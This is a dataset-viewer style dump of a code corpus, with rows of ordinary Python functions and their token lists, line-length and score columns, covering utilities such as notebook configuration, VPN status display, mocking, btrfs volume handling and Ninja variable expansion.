text
stringlengths 75
104k
| code_tokens
sequence | avg_line_len
float64 7.91
980
| score
sequence |
---|---|---|---|
def prepare_notebook_context(request, notebook_context):
"""Fill in notebook context with default values."""
if not notebook_context:
notebook_context = {}
# Override notebook Jinja templates
if "extra_template_paths" not in notebook_context:
notebook_context["extra_template_paths"] = [os.path.join(os.path.dirname(__file__), "server", "templates")]
# Furious invalid state follows if we let this slip through
assert type(notebook_context["extra_template_paths"]) == list, "Got bad extra_template_paths {}".format(notebook_context["extra_template_paths"])
# Jinja variables
notebook_context["jinja_environment_options"] = notebook_context.get("jinja_environment_options", {})
assert type(notebook_context["jinja_environment_options"]) == dict
# XXX: Following passing of global variables to Jinja templates requires Jinja 2.8.0dev+ version and is not yet supported
# http://jinja.pocoo.org/docs/dev/api/#jinja2.Environment.globals
# notebook_context["jinja_environment_options"]["globals"] = notebook_context["jinja_environment_options"].get("globals", {})
# globals_ = notebook_context["jinja_environment_options"]["globals"]
#
# assert type(globals_) == dict
#
# if not "home_url" in globals_:
# globals_["home_url"] = request.host_url
#
# if not "home_title" in globals_:
# globals_["home_title"] = "Back to site"
# Tell notebook to correctly address WebSockets allow origin policy
notebook_context["allow_origin"] = route_to_alt_domain(request, request.host_url)
notebook_context["notebook_path"] = request.route_path("notebook_proxy", remainder="")
# Record the hash of the current parameters, so we know if this user accesses the notebook in this or different context
if "context_hash" not in notebook_context:
notebook_context["context_hash"] = make_dict_hash(notebook_context)
print(notebook_context) | [
"def",
"prepare_notebook_context",
"(",
"request",
",",
"notebook_context",
")",
":",
"if",
"not",
"notebook_context",
":",
"notebook_context",
"=",
"{",
"}",
"# Override notebook Jinja templates",
"if",
"\"extra_template_paths\"",
"not",
"in",
"notebook_context",
":",
"notebook_context",
"[",
"\"extra_template_paths\"",
"]",
"=",
"[",
"os",
".",
"path",
".",
"join",
"(",
"os",
".",
"path",
".",
"dirname",
"(",
"__file__",
")",
",",
"\"server\"",
",",
"\"templates\"",
")",
"]",
"# Furious invalid state follows if we let this slip through",
"assert",
"type",
"(",
"notebook_context",
"[",
"\"extra_template_paths\"",
"]",
")",
"==",
"list",
",",
"\"Got bad extra_template_paths {}\"",
".",
"format",
"(",
"notebook_context",
"[",
"\"extra_template_paths\"",
"]",
")",
"# Jinja variables",
"notebook_context",
"[",
"\"jinja_environment_options\"",
"]",
"=",
"notebook_context",
".",
"get",
"(",
"\"jinja_environment_options\"",
",",
"{",
"}",
")",
"assert",
"type",
"(",
"notebook_context",
"[",
"\"jinja_environment_options\"",
"]",
")",
"==",
"dict",
"# XXX: Following passing of global variables to Jinja templates requires Jinja 2.8.0dev+ version and is not yet supported",
"# http://jinja.pocoo.org/docs/dev/api/#jinja2.Environment.globals",
"# notebook_context[\"jinja_environment_options\"][\"globals\"] = notebook_context[\"jinja_environment_options\"].get(\"globals\", {})",
"# globals_ = notebook_context[\"jinja_environment_options\"][\"globals\"]",
"#",
"# assert type(globals_) == dict",
"#",
"# if not \"home_url\" in globals_:",
"# globals_[\"home_url\"] = request.host_url",
"#",
"# if not \"home_title\" in globals_:",
"# globals_[\"home_title\"] = \"Back to site\"",
"# Tell notebook to correctly address WebSockets allow origin policy",
"notebook_context",
"[",
"\"allow_origin\"",
"]",
"=",
"route_to_alt_domain",
"(",
"request",
",",
"request",
".",
"host_url",
")",
"notebook_context",
"[",
"\"notebook_path\"",
"]",
"=",
"request",
".",
"route_path",
"(",
"\"notebook_proxy\"",
",",
"remainder",
"=",
"\"\"",
")",
"# Record the hash of the current parameters, so we know if this user accesses the notebook in this or different context",
"if",
"\"context_hash\"",
"not",
"in",
"notebook_context",
":",
"notebook_context",
"[",
"\"context_hash\"",
"]",
"=",
"make_dict_hash",
"(",
"notebook_context",
")",
"print",
"(",
"notebook_context",
")"
] | 46.804878 | [
0.017857142857142856,
0.03636363636363636,
0,
0.07142857142857142,
0.06896551724137931,
0,
0.05128205128205128,
0.037037037037037035,
0.02608695652173913,
0,
0.031746031746031744,
0.020134228187919462,
0,
0.09523809523809523,
0.02857142857142857,
0,
0.02857142857142857,
0,
0.024,
0.028985507246376812,
0,
0.023255813953488372,
0.0273972602739726,
0.4,
0.05714285714285714,
0.4,
0.05555555555555555,
0.04081632653061224,
0.4,
0.05263157894736842,
0.04081632653061224,
0,
0.028169014084507043,
0.03529411764705882,
0.03333333333333333,
0,
0.024390243902439025,
0.043478260869565216,
0.02666666666666667,
0,
0.07407407407407407
] |
def vpn_status(self):
"""Returns response dict"""
# Start signal handler thread if it should be running
if not self.check_pid and not self.thread_started:
self._start_handler_thread()
# Set color_bad as default output. Replaced if VPN active.
name = None
color = self.py3.COLOR_BAD
# If we are acting like the default i3status module
if self.check_pid:
if self._check_pid():
name = "yes"
color = self.py3.COLOR_GOOD
# Otherwise, find the VPN name, if it is active
else:
vpn = self._get_vpn_status()
if vpn:
name = ", ".join(vpn)
color = self.py3.COLOR_GOOD
# Format and create the response dict
full_text = self.py3.safe_format(self.format, {"name": name})
response = {
"full_text": full_text,
"color": color,
"cached_until": self.py3.CACHE_FOREVER,
}
# Cache forever unless in check_pid mode
if self.check_pid:
response["cached_until"] = self.py3.time_in(self.cache_timeout)
return response | [
"def",
"vpn_status",
"(",
"self",
")",
":",
"# Start signal handler thread if it should be running",
"if",
"not",
"self",
".",
"check_pid",
"and",
"not",
"self",
".",
"thread_started",
":",
"self",
".",
"_start_handler_thread",
"(",
")",
"# Set color_bad as default output. Replaced if VPN active.",
"name",
"=",
"None",
"color",
"=",
"self",
".",
"py3",
".",
"COLOR_BAD",
"# If we are acting like the default i3status module",
"if",
"self",
".",
"check_pid",
":",
"if",
"self",
".",
"_check_pid",
"(",
")",
":",
"name",
"=",
"\"yes\"",
"color",
"=",
"self",
".",
"py3",
".",
"COLOR_GOOD",
"# Otherwise, find the VPN name, if it is active",
"else",
":",
"vpn",
"=",
"self",
".",
"_get_vpn_status",
"(",
")",
"if",
"vpn",
":",
"name",
"=",
"\", \"",
".",
"join",
"(",
"vpn",
")",
"color",
"=",
"self",
".",
"py3",
".",
"COLOR_GOOD",
"# Format and create the response dict",
"full_text",
"=",
"self",
".",
"py3",
".",
"safe_format",
"(",
"self",
".",
"format",
",",
"{",
"\"name\"",
":",
"name",
"}",
")",
"response",
"=",
"{",
"\"full_text\"",
":",
"full_text",
",",
"\"color\"",
":",
"color",
",",
"\"cached_until\"",
":",
"self",
".",
"py3",
".",
"CACHE_FOREVER",
",",
"}",
"# Cache forever unless in check_pid mode",
"if",
"self",
".",
"check_pid",
":",
"response",
"[",
"\"cached_until\"",
"]",
"=",
"self",
".",
"py3",
".",
"time_in",
"(",
"self",
".",
"cache_timeout",
")",
"return",
"response"
] | 32.166667 | [
0.047619047619047616,
0.05714285714285714,
0,
0.03278688524590164,
0.034482758620689655,
0.05,
0,
0.030303030303030304,
0.10526315789473684,
0.058823529411764705,
0,
0.03389830508474576,
0.07692307692307693,
0.06060606060606061,
0.07142857142857142,
0.046511627906976744,
0,
0.03636363636363636,
0.15384615384615385,
0.05,
0.10526315789473684,
0.05405405405405406,
0.046511627906976744,
0,
0.044444444444444446,
0.028985507246376812,
0.15,
0.05714285714285714,
0.07407407407407407,
0.0392156862745098,
0.3333333333333333,
0,
0.041666666666666664,
0.07692307692307693,
0.02666666666666667,
0.08695652173913043
] |
def setup(self):
'''Called after instantiation'''
TelnetHandlerBase.setup(self)
# Spawn a thread to handle socket input
self.thread_ic = threading.Thread(target=self.inputcooker)
self.thread_ic.setDaemon(True)
self.thread_ic.start()
# Note that inputcooker exits on EOF
# Sleep for 0.5 second to allow options negotiation
time.sleep(0.5) | [
"def",
"setup",
"(",
"self",
")",
":",
"TelnetHandlerBase",
".",
"setup",
"(",
"self",
")",
"# Spawn a thread to handle socket input",
"self",
".",
"thread_ic",
"=",
"threading",
".",
"Thread",
"(",
"target",
"=",
"self",
".",
"inputcooker",
")",
"self",
".",
"thread_ic",
".",
"setDaemon",
"(",
"True",
")",
"self",
".",
"thread_ic",
".",
"start",
"(",
")",
"# Note that inputcooker exits on EOF",
"# Sleep for 0.5 second to allow options negotiation",
"time",
".",
"sleep",
"(",
"0.5",
")"
] | 37.090909 | [
0.0625,
0.05,
0.05405405405405406,
0.0425531914893617,
0.030303030303030304,
0.05263157894736842,
0.06666666666666667,
0.045454545454545456,
0.25,
0.03389830508474576,
0.08695652173913043
] |
def release(self, conn):
"""Revert back connection to pool."""
if conn.in_transaction:
raise InvalidRequestError(
"Cannot release a connection with "
"not finished transaction"
)
raw = conn.connection
res = yield from self._pool.release(raw)
return res | [
"def",
"release",
"(",
"self",
",",
"conn",
")",
":",
"if",
"conn",
".",
"in_transaction",
":",
"raise",
"InvalidRequestError",
"(",
"\"Cannot release a connection with \"",
"\"not finished transaction\"",
")",
"raw",
"=",
"conn",
".",
"connection",
"res",
"=",
"yield",
"from",
"self",
".",
"_pool",
".",
"release",
"(",
"raw",
")",
"return",
"res"
] | 33.9 | [
0.041666666666666664,
0.044444444444444446,
0.06451612903225806,
0.07894736842105263,
0.0392156862745098,
0.047619047619047616,
0.23076923076923078,
0.06896551724137931,
0.041666666666666664,
0.1111111111111111
] |
def mock_open(mock=None, read_data=''):
"""
A helper function to create a mock to replace the use of `open`. It works
for `open` called directly or used as a context manager.
The `mock` argument is the mock object to configure. If `None` (the
default) then a `MagicMock` will be created for you, with the API limited
to methods or attributes available on standard file handles.
`read_data` is a string for the `read` method of the file handle to return.
This is an empty string by default.
"""
global file_spec
if file_spec is None:
# set on first use
if inPy3k:
import _io
file_spec = list(set(dir(_io.TextIOWrapper)).union(set(dir(_io.BytesIO))))
else:
file_spec = file
if mock is None:
mock = MagicMock(name='open', spec=open)
handle = MagicMock(spec=file_spec)
handle.write.return_value = None
handle.__enter__.return_value = handle
handle.read.return_value = read_data
mock.return_value = handle
return mock | [
"def",
"mock_open",
"(",
"mock",
"=",
"None",
",",
"read_data",
"=",
"''",
")",
":",
"global",
"file_spec",
"if",
"file_spec",
"is",
"None",
":",
"# set on first use",
"if",
"inPy3k",
":",
"import",
"_io",
"file_spec",
"=",
"list",
"(",
"set",
"(",
"dir",
"(",
"_io",
".",
"TextIOWrapper",
")",
")",
".",
"union",
"(",
"set",
"(",
"dir",
"(",
"_io",
".",
"BytesIO",
")",
")",
")",
")",
"else",
":",
"file_spec",
"=",
"file",
"if",
"mock",
"is",
"None",
":",
"mock",
"=",
"MagicMock",
"(",
"name",
"=",
"'open'",
",",
"spec",
"=",
"open",
")",
"handle",
"=",
"MagicMock",
"(",
"spec",
"=",
"file_spec",
")",
"handle",
".",
"write",
".",
"return_value",
"=",
"None",
"handle",
".",
"__enter__",
".",
"return_value",
"=",
"handle",
"handle",
".",
"read",
".",
"return_value",
"=",
"read_data",
"mock",
".",
"return_value",
"=",
"handle",
"return",
"mock"
] | 33.129032 | [
0.02564102564102564,
0.2857142857142857,
0.03896103896103896,
0.05,
0,
0.056338028169014086,
0.05194805194805195,
0.03125,
0,
0.0379746835443038,
0.05128205128205128,
0.2857142857142857,
0.1,
0.08,
0.07692307692307693,
0.1111111111111111,
0.09090909090909091,
0.03488372093023256,
0.15384615384615385,
0.07142857142857142,
0,
0.1,
0.041666666666666664,
0,
0.05263157894736842,
0.05555555555555555,
0.047619047619047616,
0.05,
0,
0.06666666666666667,
0.13333333333333333
] |
def add_user_to_group(username, group):
"""Add a user to a group"""
cmd = ['gpasswd', '-a', username, group]
log("Adding user {} to group {}".format(username, group))
subprocess.check_call(cmd) | [
"def",
"add_user_to_group",
"(",
"username",
",",
"group",
")",
":",
"cmd",
"=",
"[",
"'gpasswd'",
",",
"'-a'",
",",
"username",
",",
"group",
"]",
"log",
"(",
"\"Adding user {} to group {}\"",
".",
"format",
"(",
"username",
",",
"group",
")",
")",
"subprocess",
".",
"check_call",
"(",
"cmd",
")"
] | 41 | [
0.02564102564102564,
0.06451612903225806,
0.045454545454545456,
0.03278688524590164,
0.06666666666666667
] |
def clone(self, parent=None):
"""
Clone this object.
@param parent: The parent for the clone.
@type parent: L{element.Element}
@return: A copy of this object assigned to the new parent.
@rtype: L{Attribute}
"""
a = Attribute(self.qname(), self.value)
a.parent = parent
return a | [
"def",
"clone",
"(",
"self",
",",
"parent",
"=",
"None",
")",
":",
"a",
"=",
"Attribute",
"(",
"self",
".",
"qname",
"(",
")",
",",
"self",
".",
"value",
")",
"a",
".",
"parent",
"=",
"parent",
"return",
"a"
] | 31.545455 | [
0.034482758620689655,
0.18181818181818182,
0.07692307692307693,
0.041666666666666664,
0.05,
0.030303030303030304,
0.07142857142857142,
0.18181818181818182,
0.0425531914893617,
0.08,
0.125
] |
def remove(self, state_element, recursive=True, force=False, destroy=True):
"""Remove item from state
:param StateElement state_element: State or state element to be removed
:param bool recursive: Only applies to removal of state and decides whether the removal should be called
recursively on all child states
:param bool force: if the removal should be forced without checking constraints
:param bool destroy: a flag that signals that the state element will be fully removed and disassembled
"""
if isinstance(state_element, State):
return self.remove_state(state_element.state_id, recursive=recursive, force=force, destroy=destroy)
elif isinstance(state_element, Transition):
return self.remove_transition(state_element.transition_id, destroy=destroy)
elif isinstance(state_element, DataFlow):
return self.remove_data_flow(state_element.data_flow_id, destroy=destroy)
elif isinstance(state_element, ScopedVariable):
return self.remove_scoped_variable(state_element.data_port_id, destroy=destroy)
else:
super(ContainerState, self).remove(state_element, force=force, destroy=destroy) | [
"def",
"remove",
"(",
"self",
",",
"state_element",
",",
"recursive",
"=",
"True",
",",
"force",
"=",
"False",
",",
"destroy",
"=",
"True",
")",
":",
"if",
"isinstance",
"(",
"state_element",
",",
"State",
")",
":",
"return",
"self",
".",
"remove_state",
"(",
"state_element",
".",
"state_id",
",",
"recursive",
"=",
"recursive",
",",
"force",
"=",
"force",
",",
"destroy",
"=",
"destroy",
")",
"elif",
"isinstance",
"(",
"state_element",
",",
"Transition",
")",
":",
"return",
"self",
".",
"remove_transition",
"(",
"state_element",
".",
"transition_id",
",",
"destroy",
"=",
"destroy",
")",
"elif",
"isinstance",
"(",
"state_element",
",",
"DataFlow",
")",
":",
"return",
"self",
".",
"remove_data_flow",
"(",
"state_element",
".",
"data_flow_id",
",",
"destroy",
"=",
"destroy",
")",
"elif",
"isinstance",
"(",
"state_element",
",",
"ScopedVariable",
")",
":",
"return",
"self",
".",
"remove_scoped_variable",
"(",
"state_element",
".",
"data_port_id",
",",
"destroy",
"=",
"destroy",
")",
"else",
":",
"super",
"(",
"ContainerState",
",",
"self",
")",
".",
"remove",
"(",
"state_element",
",",
"force",
"=",
"force",
",",
"destroy",
"=",
"destroy",
")"
] | 64.578947 | [
0.013333333333333334,
0.06060606060606061,
0,
0.0379746835443038,
0.03571428571428571,
0.046511627906976744,
0.04597701149425287,
0.03636363636363636,
0.18181818181818182,
0.045454545454545456,
0.02702702702702703,
0.0392156862745098,
0.034482758620689655,
0.04081632653061224,
0.03529411764705882,
0.03636363636363636,
0.03296703296703297,
0.15384615384615385,
0.03296703296703297
] |
def _fit(self, col):
"""Create a map of the empirical probability for each category.
Args:
col(pandas.DataFrame): Data to transform.
"""
column = col[self.col_name].replace({np.nan: np.inf})
frequencies = column.groupby(column).count().rename({np.inf: None}).to_dict()
# next set probability ranges on interval [0,1]
start = 0
end = 0
num_vals = len(col)
for val in frequencies:
prob = frequencies[val] / num_vals
end = start + prob
interval = (start, end)
mean = np.mean(interval)
std = prob / 6
self.probability_map[val] = (interval, mean, std)
start = end | [
"def",
"_fit",
"(",
"self",
",",
"col",
")",
":",
"column",
"=",
"col",
"[",
"self",
".",
"col_name",
"]",
".",
"replace",
"(",
"{",
"np",
".",
"nan",
":",
"np",
".",
"inf",
"}",
")",
"frequencies",
"=",
"column",
".",
"groupby",
"(",
"column",
")",
".",
"count",
"(",
")",
".",
"rename",
"(",
"{",
"np",
".",
"inf",
":",
"None",
"}",
")",
".",
"to_dict",
"(",
")",
"# next set probability ranges on interval [0,1]",
"start",
"=",
"0",
"end",
"=",
"0",
"num_vals",
"=",
"len",
"(",
"col",
")",
"for",
"val",
"in",
"frequencies",
":",
"prob",
"=",
"frequencies",
"[",
"val",
"]",
"/",
"num_vals",
"end",
"=",
"start",
"+",
"prob",
"interval",
"=",
"(",
"start",
",",
"end",
")",
"mean",
"=",
"np",
".",
"mean",
"(",
"interval",
")",
"std",
"=",
"prob",
"/",
"6",
"self",
".",
"probability_map",
"[",
"val",
"]",
"=",
"(",
"interval",
",",
"mean",
",",
"std",
")",
"start",
"=",
"end"
] | 32.545455 | [
0.05,
0.028169014084507043,
0,
0.15384615384615385,
0.03773584905660377,
0.18181818181818182,
0,
0.03278688524590164,
0.03529411764705882,
0.03636363636363636,
0.11764705882352941,
0.13333333333333333,
0.07407407407407407,
0,
0.06451612903225806,
0.043478260869565216,
0.06666666666666667,
0.05714285714285714,
0.05555555555555555,
0.07692307692307693,
0.03278688524590164,
0.08695652173913043
] |
def add(self, val):
"""Add `val` to the current value.
:type val: int
:param val: Value to add.
"""
if not isinstance(val, six.integer_types):
raise ValueError("GaugePointLong only supports integer types")
with self._value_lock:
self.value += val | [
"def",
"add",
"(",
"self",
",",
"val",
")",
":",
"if",
"not",
"isinstance",
"(",
"val",
",",
"six",
".",
"integer_types",
")",
":",
"raise",
"ValueError",
"(",
"\"GaugePointLong only supports integer types\"",
")",
"with",
"self",
".",
"_value_lock",
":",
"self",
".",
"value",
"+=",
"val"
] | 31 | [
0.05263157894736842,
0.047619047619047616,
0,
0.13636363636363635,
0.09090909090909091,
0.18181818181818182,
0.04,
0.02702702702702703,
0.06666666666666667,
0.06896551724137931
] |
def path(ctx, paths):
"""DEPRECATED: use 'renku storage pull'."""
click.secho('Use "renku storage pull" instead.', fg='red', err=True)
ctx.exit(2) | [
"def",
"path",
"(",
"ctx",
",",
"paths",
")",
":",
"click",
".",
"secho",
"(",
"'Use \"renku storage pull\" instead.'",
",",
"fg",
"=",
"'red'",
",",
"err",
"=",
"True",
")",
"ctx",
".",
"exit",
"(",
"2",
")"
] | 38.75 | [
0.047619047619047616,
0.0425531914893617,
0.027777777777777776,
0.13333333333333333
] |
def _create_vxr(self, f, recStart, recEnd, currentVDR, priorVXR, vvrOffset):
'''
Create a VXR AND use a VXR
Parameters:
f : file
The open CDF file
recStart : int
The start record of this block
recEnd : int
The ending record of this block
currentVDR : int
The byte location of the variables VDR
priorVXR : int
The byte location of the previous VXR
vvrOffset : int
The byte location of ther VVR
Returns:
vxroffset : int
The byte location of the created vxr
'''
# add a VXR, use an entry, and link it to the prior VXR if it exists
vxroffset = self._write_vxr(f)
self._use_vxrentry(f, vxroffset, recStart, recEnd, vvrOffset)
if (priorVXR == 0):
# VDR's VXRhead
self._update_offset_value(f, currentVDR+28, 8, vxroffset)
else:
# VXR's next
self._update_offset_value(f, priorVXR+12, 8, vxroffset)
# VDR's VXRtail
self._update_offset_value(f, currentVDR+36, 8, vxroffset)
return vxroffset | [
"def",
"_create_vxr",
"(",
"self",
",",
"f",
",",
"recStart",
",",
"recEnd",
",",
"currentVDR",
",",
"priorVXR",
",",
"vvrOffset",
")",
":",
"# add a VXR, use an entry, and link it to the prior VXR if it exists",
"vxroffset",
"=",
"self",
".",
"_write_vxr",
"(",
"f",
")",
"self",
".",
"_use_vxrentry",
"(",
"f",
",",
"vxroffset",
",",
"recStart",
",",
"recEnd",
",",
"vvrOffset",
")",
"if",
"(",
"priorVXR",
"==",
"0",
")",
":",
"# VDR's VXRhead",
"self",
".",
"_update_offset_value",
"(",
"f",
",",
"currentVDR",
"+",
"28",
",",
"8",
",",
"vxroffset",
")",
"else",
":",
"# VXR's next",
"self",
".",
"_update_offset_value",
"(",
"f",
",",
"priorVXR",
"+",
"12",
",",
"8",
",",
"vxroffset",
")",
"# VDR's VXRtail",
"self",
".",
"_update_offset_value",
"(",
"f",
",",
"currentVDR",
"+",
"36",
",",
"8",
",",
"vxroffset",
")",
"return",
"vxroffset"
] | 34.2 | [
0.013157894736842105,
0.18181818181818182,
0.058823529411764705,
0,
0.10526315789473684,
0.15,
0.06060606060606061,
0.11538461538461539,
0.043478260869565216,
0.125,
0.0425531914893617,
0.10714285714285714,
0.037037037037037035,
0.11538461538461539,
0.03773584905660377,
0.1111111111111111,
0.044444444444444446,
0,
0.125,
0.1111111111111111,
0.038461538461538464,
0,
0.18181818181818182,
0.02631578947368421,
0.05263157894736842,
0.028985507246376812,
0.07407407407407407,
0.07407407407407407,
0.028985507246376812,
0.15384615384615385,
0.08333333333333333,
0.029850746268656716,
0.08695652173913043,
0.03076923076923077,
0.08333333333333333
] |
def compile_pattern(word):
"""
take a word pattern and return a Python regexp. A word pattern is a word
with unknown letters replaced by a '?', e.g. 'di?ti??nar?'.
"""
return re.compile(r'^%s$' % re.sub(r'\?', '[a-z]',
dicts.sanitize_word(word))) | [
"def",
"compile_pattern",
"(",
"word",
")",
":",
"return",
"re",
".",
"compile",
"(",
"r'^%s$'",
"%",
"re",
".",
"sub",
"(",
"r'\\?'",
",",
"'[a-z]'",
",",
"dicts",
".",
"sanitize_word",
"(",
"word",
")",
")",
")"
] | 42.714286 | [
0.038461538461538464,
0.2857142857142857,
0.02631578947368421,
0.031746031746031744,
0.2857142857142857,
0.05555555555555555,
0.06060606060606061
] |
def _fillVolumesAndPaths(self, paths):
""" Fill in paths.
:arg paths: = { Store.Volume: ["linux path",]}
"""
with self.btrfs as mount:
for bv in mount.subvolumes:
if not bv.readOnly:
continue
vol = self._btrfsVol2StoreVol(bv)
if vol is None:
continue
path = bv.fullPath
if path is None:
logger.info("Skipping deleted volume %s", bv.uuid)
continue
relPath = None
for path in bv.linuxPaths:
path = self._relativePath(path)
if path is None:
continue # path is outside store scope
paths[vol].append(path)
infoPath = self._fullPath(path + Store.theInfoExtension)
if os.path.exists(infoPath):
logger.debug("Reading %s", infoPath)
with open(infoPath) as info:
Store.Volume.readInfo(info)
if not path.startswith("/"):
relPath = path
if vol not in paths:
continue
logger.debug("%s", vol.display(sink=self, detail='phrase'))
if vol.uuid in self.butterVolumes:
logger.warn(
"Duplicate effective uuid %s in '%s' and '%s'",
vol.uuid, path, self.butterVolumes[vol.uuid].fullPath
)
self.butterVolumes[vol.uuid] = bv
if relPath is not None:
# vol is inside Store directory
self.extraVolumes[vol] = relPath | [
"def",
"_fillVolumesAndPaths",
"(",
"self",
",",
"paths",
")",
":",
"with",
"self",
".",
"btrfs",
"as",
"mount",
":",
"for",
"bv",
"in",
"mount",
".",
"subvolumes",
":",
"if",
"not",
"bv",
".",
"readOnly",
":",
"continue",
"vol",
"=",
"self",
".",
"_btrfsVol2StoreVol",
"(",
"bv",
")",
"if",
"vol",
"is",
"None",
":",
"continue",
"path",
"=",
"bv",
".",
"fullPath",
"if",
"path",
"is",
"None",
":",
"logger",
".",
"info",
"(",
"\"Skipping deleted volume %s\"",
",",
"bv",
".",
"uuid",
")",
"continue",
"relPath",
"=",
"None",
"for",
"path",
"in",
"bv",
".",
"linuxPaths",
":",
"path",
"=",
"self",
".",
"_relativePath",
"(",
"path",
")",
"if",
"path",
"is",
"None",
":",
"continue",
"# path is outside store scope",
"paths",
"[",
"vol",
"]",
".",
"append",
"(",
"path",
")",
"infoPath",
"=",
"self",
".",
"_fullPath",
"(",
"path",
"+",
"Store",
".",
"theInfoExtension",
")",
"if",
"os",
".",
"path",
".",
"exists",
"(",
"infoPath",
")",
":",
"logger",
".",
"debug",
"(",
"\"Reading %s\"",
",",
"infoPath",
")",
"with",
"open",
"(",
"infoPath",
")",
"as",
"info",
":",
"Store",
".",
"Volume",
".",
"readInfo",
"(",
"info",
")",
"if",
"not",
"path",
".",
"startswith",
"(",
"\"/\"",
")",
":",
"relPath",
"=",
"path",
"if",
"vol",
"not",
"in",
"paths",
":",
"continue",
"logger",
".",
"debug",
"(",
"\"%s\"",
",",
"vol",
".",
"display",
"(",
"sink",
"=",
"self",
",",
"detail",
"=",
"'phrase'",
")",
")",
"if",
"vol",
".",
"uuid",
"in",
"self",
".",
"butterVolumes",
":",
"logger",
".",
"warn",
"(",
"\"Duplicate effective uuid %s in '%s' and '%s'\"",
",",
"vol",
".",
"uuid",
",",
"path",
",",
"self",
".",
"butterVolumes",
"[",
"vol",
".",
"uuid",
"]",
".",
"fullPath",
")",
"self",
".",
"butterVolumes",
"[",
"vol",
".",
"uuid",
"]",
"=",
"bv",
"if",
"relPath",
"is",
"not",
"None",
":",
"# vol is inside Store directory",
"self",
".",
"extraVolumes",
"[",
"vol",
"]",
"=",
"relPath"
] | 31.981818 | [
0.02631578947368421,
0.07692307692307693,
0,
0.09259259259259259,
0.18181818181818182,
0.06060606060606061,
0.05128205128205128,
0.05714285714285714,
0.07142857142857142,
0,
0.04081632653061224,
0.06451612903225806,
0.07142857142857142,
0,
0.058823529411764705,
0,
0.0625,
0.02857142857142857,
0.07142857142857142,
0,
0.06666666666666667,
0,
0.047619047619047616,
0.0392156862745098,
0,
0.05555555555555555,
0.031746031746031744,
0,
0.046511627906976744,
0,
0.02631578947368421,
0.041666666666666664,
0.03333333333333333,
0.038461538461538464,
0.03636363636363636,
0,
0.041666666666666664,
0.05263157894736842,
0,
0.05555555555555555,
0.07142857142857142,
0,
0.02666666666666667,
0,
0.04,
0.09375,
0.028169014084507043,
0.025974025974025976,
0.14285714285714285,
0,
0.04081632653061224,
0,
0.05128205128205128,
0.0392156862745098,
0.038461538461538464
] |
def choices(self):
""" Print the choices for this question.
This may be a empty string and in the case of a list of validators
we will only show the first validator's choices.
"""
if isinstance(self.validator, list):
return self.validator[0].print_choices()
return self.validator.print_choices() | [
"def",
"choices",
"(",
"self",
")",
":",
"if",
"isinstance",
"(",
"self",
".",
"validator",
",",
"list",
")",
":",
"return",
"self",
".",
"validator",
"[",
"0",
"]",
".",
"print_choices",
"(",
")",
"return",
"self",
".",
"validator",
".",
"print_choices",
"(",
")"
] | 39.555556 | [
0.05555555555555555,
0.041666666666666664,
0,
0.02564102564102564,
0.03333333333333333,
0.18181818181818182,
0.045454545454545456,
0.038461538461538464,
0.044444444444444446
] |
def get_ranges(self, tchain, kw):
"""Return list of ranges defined in `tchain`.
`kw` is the statement keyword determining the type of the
range, i.e. 'range' or 'length'. `tchain` is the chain of type
definitions from which the resulting range is obtained.
The returned value is a list of tuples containing the segments
of the resulting range.
"""
(lo, hi) = ("min", "max")
ran = None
for t in tchain:
rstmt = t.search_one(kw)
if rstmt is None: continue
parts = [ p.strip() for p in rstmt.arg.split("|") ]
ran = [ [ i.strip() for i in p.split("..") ] for p in parts ]
if ran[0][0] != 'min': lo = ran[0][0]
if ran[-1][-1] != 'max': hi = ran[-1][-1]
if ran is None: return None
if len(ran) == 1:
return [(lo, hi)]
else:
return [(lo, ran[0][-1])] + ran[1:-1] + [(ran[-1][0], hi)] | [
"def",
"get_ranges",
"(",
"self",
",",
"tchain",
",",
"kw",
")",
":",
"(",
"lo",
",",
"hi",
")",
"=",
"(",
"\"min\"",
",",
"\"max\"",
")",
"ran",
"=",
"None",
"for",
"t",
"in",
"tchain",
":",
"rstmt",
"=",
"t",
".",
"search_one",
"(",
"kw",
")",
"if",
"rstmt",
"is",
"None",
":",
"continue",
"parts",
"=",
"[",
"p",
".",
"strip",
"(",
")",
"for",
"p",
"in",
"rstmt",
".",
"arg",
".",
"split",
"(",
"\"|\"",
")",
"]",
"ran",
"=",
"[",
"[",
"i",
".",
"strip",
"(",
")",
"for",
"i",
"in",
"p",
".",
"split",
"(",
"\"..\"",
")",
"]",
"for",
"p",
"in",
"parts",
"]",
"if",
"ran",
"[",
"0",
"]",
"[",
"0",
"]",
"!=",
"'min'",
":",
"lo",
"=",
"ran",
"[",
"0",
"]",
"[",
"0",
"]",
"if",
"ran",
"[",
"-",
"1",
"]",
"[",
"-",
"1",
"]",
"!=",
"'max'",
":",
"hi",
"=",
"ran",
"[",
"-",
"1",
"]",
"[",
"-",
"1",
"]",
"if",
"ran",
"is",
"None",
":",
"return",
"None",
"if",
"len",
"(",
"ran",
")",
"==",
"1",
":",
"return",
"[",
"(",
"lo",
",",
"hi",
")",
"]",
"else",
":",
"return",
"[",
"(",
"lo",
",",
"ran",
"[",
"0",
"]",
"[",
"-",
"1",
"]",
")",
"]",
"+",
"ran",
"[",
"1",
":",
"-",
"1",
"]",
"+",
"[",
"(",
"ran",
"[",
"-",
"1",
"]",
"[",
"0",
"]",
",",
"hi",
")",
"]"
] | 39.791667 | [
0.030303030303030304,
0.03773584905660377,
0,
0.046153846153846156,
0.04285714285714286,
0.031746031746031744,
0,
0.02857142857142857,
0.06451612903225806,
0.18181818181818182,
0.06060606060606061,
0.1111111111111111,
0.08333333333333333,
0.05555555555555555,
0.07894736842105263,
0.06349206349206349,
0.0821917808219178,
0.061224489795918366,
0.05660377358490566,
0.08571428571428572,
0.08,
0.06896551724137931,
0.15384615384615385,
0.02857142857142857
] |
def expand(string, vars, local_vars={}):
"""Expand a string containing $vars as Ninja would.
Note: doesn't handle the full Ninja variable syntax, but it's enough
to make configure.py's use of it work.
"""
def exp(m):
var = m.group(1)
if var == '$':
return '$'
return local_vars.get(var, vars.get(var, ''))
return re.sub(r'\$(\$|\w*)', exp, string) | [
"def",
"expand",
"(",
"string",
",",
"vars",
",",
"local_vars",
"=",
"{",
"}",
")",
":",
"def",
"exp",
"(",
"m",
")",
":",
"var",
"=",
"m",
".",
"group",
"(",
"1",
")",
"if",
"var",
"==",
"'$'",
":",
"return",
"'$'",
"return",
"local_vars",
".",
"get",
"(",
"var",
",",
"vars",
".",
"get",
"(",
"var",
",",
"''",
")",
")",
"return",
"re",
".",
"sub",
"(",
"r'\\$(\\$|\\w*)'",
",",
"exp",
",",
"string",
")"
] | 33.083333 | [
0.025,
0.03636363636363636,
0,
0.027777777777777776,
0.047619047619047616,
0.2857142857142857,
0.13333333333333333,
